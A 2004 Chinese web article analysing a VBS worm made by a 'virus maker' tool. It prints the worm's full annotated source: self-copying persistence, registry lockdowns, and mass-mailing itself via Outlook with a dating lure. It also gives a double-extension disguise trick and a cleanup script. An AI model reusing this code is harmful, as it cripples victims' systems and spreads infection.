-
您的位置:首页 → 网络冲浪 → 病毒快报 → VBS病毒制造机v1.0 分析报告
VBS病毒制造机v1.0 分析报告
时间:2004/10/8 16:41:00来源:本站整理作者:蓝点我要评论(4)
-
警告:此文只是做一些技术性的分析,希望大家不要乱用,造成的任何后果本人概不负责。切记。
病毒制造机,这是网上流行的一款典型的病毒制造机(病毒制造机:顾名思义,就是制造病毒的机器(^_^废话)),用于傻瓜型手工制造vbs病毒(vbs病毒:就是Visual Basic Script即是VB脚本,一种通过Microsoft的Windows Script Host提供的一种基于32位Windows平台的、与语言无关的脚本解释机制,它使得脚本能够直接在Windows桌面或命令提示符下运行。利用WSH,用户能够操纵WSH对象、ActiveX对象、注册表和文件系统。是不是功能强大,怕怕了吧?!)。
这个软件可能是用VB编写(没有询问作者详情),调用了kernel32.dll、user32.dll和advapi32.dll三个系统动态链接库.在这里,kernel32.dll主要用于系统控制,包括进程创建,变量设置,虚拟内存管理,系统资源管理等等,是操作系统必需的库之一。user32.dll主要用于与用户交互的通信,包括messege的传递与echo等。advapi32.dll主要用于程序与系统的API接口,这里即注册表的一些操作,包括RegOpenKey(取得SubKey的Handle),RegCloseKey(关闭打开或者建立的SubKey),RegQueryvalueEx(读取指定Key的值)。
下面是运行这个制造机(其中提供的功能选择全选,也就是病毒荷载最“狠”化,说白了,就是所有破坏功能都选了,最毒)之后,得到的一个*.vbs脚本病毒(用各大杀毒软件均提示存在vbs.xxxxx病毒)的源代码,加上我的一些注释(改一下名字,比如xxxx.txt .vbs,这里第一和第二后缀名之间N个空格,是不是很迷惑人,以后大家注意防范这样的手段哦(也算一种社会工程吧^_^),就可以发送电子邮件或者其他的方式传播破坏了,您千万不要那样做哦,哈哈!不要做坏蛋!要做好人!)。
On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject") '创建一个能与操作系统沟通的对象,再利用该对象的各种方法对注册表进行操作
Set dir1=fs.GetSpecialFolder(0) '获取Windows/WinNT文件夹位置
Set dir2=fs.GetSpecialFolder(1) '获取System32/System文件夹位置
Set so=CreateObject("Scripting.FileSystemObject")
dim r '定义一个变量
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Win32system.vbs") '复制病毒副本到Windows/WinNT文件夹位置
so.GetFile(WScript.ScriptFullName).Copy(dir2&"\Win32system.vbs") '复制病毒副本到System32/System文件夹位置
so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Start Menu\Programs\启动\Win32system.vbs") '复制病毒副本到Start Menu启动菜单
'下面是对注册表的恶意修改和简单的依靠OE传播
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD" '修改注册表,禁止“运行”菜单
r.Regwrite "KCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD" '修改注册表,禁止“关闭”菜单
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",63000000,"REG_DWORD" '修改注册表,隐藏所有逻辑盘符
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD" '修改注册表,禁止注册表编辑
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry","" '修改注册表,禁止开机注册表扫描
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD" '修改注册表,禁止“注销”菜单
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD" '修改注册表,禁止MS-DOS实模式
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","Win32system.vbs" '修改注册表,使这个脚本本身开机自动运行
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD" '修改注册表,禁止显示桌面图标
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD" '修改注册表,禁止纯DOS模式
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar",1,"REG_DWORD" '修改注册表,禁止“任务栏和开始”菜单
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD" '修改注册表,禁止右键菜单
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD" '修改注册表,禁止控制面板
r.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile" '修改注册表,禁止导入使用.reg文件,改为用txt文件的关联
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","警告" '设置开机提示框标题
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","您中vbs脚本病毒了,哭吧~" '设置开机提示框文本内容
Set ol=CreateObject("Outlook.Application") '创建Outlook文件对象用于传播
On Error Resume Next
For x=1 To 100
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x) '用于向地址簿的前100名发送此 VBS病毒,可以算是简单弱智的蠕虫了吧~~
Mail.Subject="今晚你来吗?" '邮件主题
Mail.Body="朋友你好:您的朋友Rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! 同城约会网" '邮件内容
Mail.Attachments.Add(dir2&"Win32system.vbs")
Mail.Send
Next
ol.Quit
'下面是对Internet Explore 选项的恶意修改
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD" '修改注册表,禁止鼠标右键
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD" '修改注册表,禁止Internet选项
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",1,"REG_DWORD" '修改注册表,禁止“另存为”
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",1,"REG_DWORD" '修改注册表,禁止“文件/打开”菜单
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",1,"REG_DWORD" '修改注册表,禁止更改高级页设置
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",1,"REG_DWORD" '修改注册表,禁止更改临时文件设置
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",1,"REG_DWORD" '修改注册表,禁止更改自动配置
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD" '修改注册表,禁止更改主页,即“主页”变灰
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",1,"REG_DWORD" '修改注册表,禁止更改历史记录设置
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",1,"REG_DWORD" '修改注册表,禁止更改Internet连接向导
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD" '修改注册表,禁止更改安全项
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",1,"REG_DWORD" '修改注册表,禁止“重置web设置”
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD" '修改注册表,禁止查看源文件
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD" '修改注册表,禁止添加脱机计划
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD" '修改注册表,禁止“文件”菜单
下面就是作者提供的“解药”--恢复文件reset.vbs的源代码:
(由于这里与上面的病毒破坏恶意修改恰好相反,故不做注释了)
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree.exe","start.exe /m deltree /y "&dir1&"\Win32system.vbs"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree.exe","start.exe /m deltree /y "&dir2&"\Win32system.vbs"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree.exe","start.exe /m deltree /y "&dir1&"\Start Menu\Programs\启动\Win32system.vbs"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry","scanregw.exe /autorun"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",0,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system",""
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",0,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption",""
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText",""
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",0,"REG_DWORD"
通过以上的分析,大家是不是觉得VBS病毒实在太简单了,的确这样:VBS蠕虫就是这么一回事。但是这个病毒制造机出的病毒算是很菜鸟级了,因为其恐怖的破坏功能,实在让人为它捏了一把冷汗,纵使再高的高手,注册表遭遇这么严重的创伤,不重做系统才怪(否则只能说明他/她的耐心实在能让人肃然起敬¥#¥)。所以这个病毒只是太坏了,太狠了。技术性的东西实在没有多少,没有什么新意。从传染性和隐藏性来看也是很一般般。
最后再次严正申明请不要去做非法的事,小心“白帽子”请你喝茶。
纯粹的技术研究值得提倡。
PS:以上分析不当之处,敬请指正,谢谢。
相关阅读
Windows错误代码大全 Windows错误代码查询激活windows有什么用Mac QQ和Windows QQ聊天记录怎么合并 Mac QQ和Windows QQ聊天记录Windows 10自动更新怎么关闭 如何关闭Windows 10自动更新windows 10 rs4快速预览版17017下载错误问题Win10秋季创意者更新16291更新了什么 win10 16291更新内容windows10秋季创意者更新时间 windows10秋季创意者更新内容kb3150513补丁更新了什么 Windows 10补丁kb3150513是什么
-
热门文章
没有查询到任何记录。
最新文章
火球病毒是什么意思 火360保险箱如何保护程序
安卓手机病毒Android.KungFu来袭 用户小心流lpk.dll是什么病毒_lpk.dll病毒专杀方法BMW病毒技术深入分析“图片大盗”通过聊天传播 专盗网游账号
人气排行
eset nod32序列号 nod32升级id 2009年8月28lpk.dll是什么病毒_lpk.dll病毒专杀方法最厉害病毒排行榜职业盗号的基本流程试图连接本机的IP端口,该操作被拒绝VBS病毒制造机v1.0 分析报告360保险箱如何保护程序和游戏账号中搜.桌面传媒Deskipn专杀彻底删除办法
查看所有4条评论>>